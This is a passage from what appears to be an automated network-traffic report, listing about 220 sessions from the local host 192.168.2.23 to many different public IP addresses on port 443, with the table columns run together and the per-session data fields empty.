                                                19724192.168.2.2351026189.163.169.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19725192.168.2.2345158168.64.167.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19726192.168.2.23381449.171.92.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19727192.168.2.234742445.221.195.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19728192.168.2.2346078105.175.93.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19729192.168.2.234189635.186.197.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19730192.168.2.2355590159.248.69.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19731192.168.2.2350598111.14.104.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19732192.168.2.234920061.121.4.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19733192.168.2.23464565.226.132.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19734192.168.2.2359046101.84.132.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19735192.168.2.2340930169.131.148.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19736192.168.2.2353404106.171.125.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19737192.168.2.2357678103.124.216.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19738192.168.2.2341632103.11.42.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19739192.168.2.233756062.186.32.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19740192.168.2.234109627.152.98.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19741192.168.2.2347914223.113.50.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19742192.168.2.233378836.35.41.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19743192.168.2.234000699.119.131.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19744192.168.2.2356812164.114.42.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19745192.168.2.2359818185.129.218.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19746192.168.2.2333306220.118.218.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19747192.168.2.2356384172.197.158.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19748192.168.2.235203039.53.112.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19749192.168.2.2356904173.58.108.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19750192.168.2.2356864169.136.3.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19751192.168.2.23589989.255.116.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19752192.168.2.2344922109.96.236.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19753192.168.2.2335272222.51.222.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19754192.168.2.2337010170.146.120.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19755192.168.2.2333390163.42.178.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19756192.168.2.235825238.40.75.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19757192.168.2.235549257.90.224.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19758192.168.2.2360970177.186.132.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19759192.168.2.235372491.185.31.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19760192.168.2.2339124131.138.185.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19761192.168.2.2355484190.127.31.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19762192.168.2.236027842.55.7.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19763192.168.2.2348010218.59.150.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19764192.168.2.234010243.7.61.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19765192.168.2.2335514212.78.105.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19766192.168.2.2356036174.248.228.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19767192.168.2.234284889.223.241.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19768192.168.2.2341894209.238.39.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19769192.168.2.2338972112.239.126.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19770192.168.2.233941275.35.103.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19771192.168.2.2343804126.111.220.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19772192.168.2.234027220.156.145.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19773192.168.2.233631858.12.20.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19774192.168.2.2347268130.167.48.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19775192.168.2.233567635.178.158.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19776192.168.2.2356338146.243.70.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19777192.168.2.235917437.45.124.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19778192.168.2.2357942106.218.150.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19779192.168.2.2349104121.132.131.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19780192.168.2.234217091.99.240.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19781192.168.2.2358020206.65.55.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19782192.168.2.234484298.143.134.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19783192.168.2.2342950125.9.97.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19784192.168.2.2359892144.127.155.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19785192.168.2.235005248.207.252.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19786192.168.2.2359396213.12.200.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19787192.168.2.2360546139.113.96.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19788192.168.2.234734425.32.232.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19789192.168.2.234163286.222.131.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19790192.168.2.235889251.246.141.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19791192.168.2.2349844210.48.84.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19792192.168.2.2353256177.194.97.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19793192.168.2.2352374210.124.21.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19794192.168.2.2347782158.154.8.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19795192.168.2.2341412207.46.104.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19796192.168.2.2359234204.119.147.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19797192.168.2.2356496153.3.121.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19798192.168.2.235926644.97.10.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19799192.168.2.23333024.67.109.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19800192.168.2.2360840185.188.130.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19801192.168.2.2337524111.141.227.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19802192.168.2.2352596213.16.190.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19803192.168.2.234580674.28.207.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19804192.168.2.2346400208.51.186.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19805192.168.2.235834485.120.94.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19806192.168.2.234466239.6.37.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19807192.168.2.233734277.123.98.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19808192.168.2.2346840113.195.185.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19809192.168.2.2347796175.133.98.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19810192.168.2.2340532125.236.235.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19811192.168.2.2354480135.150.33.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19812192.168.2.2336456168.216.6.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19813192.168.2.233375258.117.138.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19814192.168.2.2347800194.125.99.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19815192.168.2.2337320205.136.115.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19816192.168.2.2344282113.86.11.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19817192.168.2.234013424.45.136.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19818192.168.2.2351184118.145.182.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19819192.168.2.234918887.254.170.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19820192.168.2.235126680.45.7.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19821192.168.2.23510802.98.239.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19822192.168.2.2352220200.142.130.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19823192.168.2.235950890.56.91.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19824192.168.2.2352030123.36.39.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19825192.168.2.2358108125.168.227.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19826192.168.2.2359120136.172.249.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19827192.168.2.2344320185.81.51.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19828192.168.2.2351534204.156.174.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19829192.168.2.234130060.225.106.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19830192.168.2.2335728112.215.156.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19831192.168.2.2333228202.231.115.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19832192.168.2.2352092123.8.121.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19833192.168.2.2339286175.153.232.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19834192.168.2.2346478165.29.62.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19835192.168.2.233973282.238.14.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19836192.168.2.2337832150.208.60.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19837192.168.2.2340992145.194.35.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19838192.168.2.235237085.165.250.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19839192.168.2.233477877.14.42.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19840192.168.2.234361047.120.134.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19841192.168.2.2334790128.89.87.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19842192.168.2.2359830117.183.32.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19843192.168.2.2341966131.226.21.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19844192.168.2.2336532135.164.160.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19845192.168.2.2359166187.121.73.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19846192.168.2.2353018144.234.68.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19847192.168.2.2335342132.232.154.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19848192.168.2.2337394102.221.65.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19849192.168.2.2351824220.181.2.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19850192.168.2.233631657.208.18.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19851192.168.2.234464424.100.65.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19852192.168.2.2360552136.111.177.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19853192.168.2.2350682180.113.16.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19854192.168.2.2334494125.46.48.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19855192.168.2.2357428161.227.31.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19856192.168.2.234426881.24.134.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19857192.168.2.2335514113.117.215.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19858192.168.2.23545004.238.0.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19859192.168.2.23357425.116.129.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19860192.168.2.233420283.85.203.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19861192.168.2.2357590190.183.57.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19862192.168.2.235588435.186.12.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19863192.168.2.2335924210.241.228.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19864192.168.2.2352394107.19.30.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19865192.168.2.235743068.100.174.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19866192.168.2.2354328128.229.184.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19867192.168.2.2344308213.110.96.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19868192.168.2.236045218.222.100.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19869192.168.2.234019485.119.146.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19870192.168.2.2335140106.249.213.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19871192.168.2.235437881.19.108.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19872192.168.2.2339682195.215.140.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19873192.168.2.23376664.86.171.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19874192.168.2.234562058.81.57.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19875192.168.2.2342920140.234.64.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19876192.168.2.234377696.186.53.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19877192.168.2.2343974167.133.252.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19878192.168.2.233834839.221.191.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19879192.168.2.2333918144.56.230.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19880192.168.2.2355804109.162.240.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19881192.168.2.2353502108.219.251.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19882192.168.2.234764668.141.33.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19883192.168.2.2346948219.60.30.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19884192.168.2.2353198167.240.78.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19885192.168.2.2360684162.131.4.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19886192.168.2.2349060150.249.30.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19887192.168.2.235492044.24.227.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19888192.168.2.234529490.102.210.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19889192.168.2.235403442.154.161.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19890192.168.2.2339746182.160.112.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19891192.168.2.233943484.62.192.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19892192.168.2.233612043.252.77.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19893192.168.2.2346016132.87.208.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19894192.168.2.236044670.222.151.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19895192.168.2.2356770184.196.221.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19896192.168.2.233446818.24.68.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19897192.168.2.2352736118.148.220.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19898192.168.2.2345574217.91.211.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19899192.168.2.235557478.31.200.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19900192.168.2.2342196143.220.63.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19901192.168.2.2360760114.103.195.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19902192.168.2.2347226201.76.207.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19903192.168.2.2344126150.122.179.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19904192.168.2.2360250188.220.176.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19905192.168.2.233677058.248.99.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19906192.168.2.2344168114.91.11.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19907192.168.2.234900071.155.239.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19908192.168.2.236003081.236.186.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19909192.168.2.2357378138.109.154.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19910192.168.2.235908827.213.55.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19911192.168.2.2357618221.242.75.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19912192.168.2.234524250.11.229.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19913192.168.2.2350146218.8.123.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19914192.168.2.2341260134.62.6.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19915192.168.2.233296284.140.107.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19916192.168.2.234855694.147.167.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19917192.168.2.2343370184.176.122.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19918192.168.2.2360944202.23.95.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19919192.168.2.2341946223.202.118.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19920192.168.2.2347970203.100.182.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19921192.168.2.234608471.63.28.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19922192.168.2.2356528147.163.130.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19923192.168.2.2353968187.175.20.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19924192.168.2.235520877.217.183.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19925192.168.2.2354762180.151.206.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19926192.168.2.2336320153.150.85.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19927192.168.2.2351654156.253.253.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19928192.168.2.234426613.93.144.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19929192.168.2.234409270.108.209.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19930192.168.2.235588017.109.14.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19931192.168.2.235307612.227.103.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19932192.168.2.236014275.57.220.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19933192.168.2.234345665.86.40.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19934192.168.2.235394881.70.218.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19935192.168.2.236073065.12.247.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19936192.168.2.233617031.136.52.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19937192.168.2.235658674.133.57.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19938192.168.2.235585235.11.66.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19939192.168.2.234539018.118.115.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19940192.168.2.2345484216.67.218.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19941192.168.2.2349692107.33.234.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19942192.168.2.234361440.58.169.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19943192.168.2.2351562188.30.248.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19944192.168.2.2354736201.5.170.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19945192.168.2.2335616119.83.81.243443
                                                TimestampBytes transferredDirectionData


